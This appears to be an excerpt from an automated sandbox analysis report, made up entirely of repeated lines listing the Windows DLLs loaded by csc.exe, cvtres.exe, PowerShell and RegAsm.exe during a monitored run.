            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: mscoree.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: mscoree.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: mscoree.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: mscoree.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: apphelp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: aclayers.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wldp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winhttp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: webio.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mswsock.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winnsi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sspicli.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: schannel.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mskeyprotect.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ntasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncryptsslp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: gpapi.dll
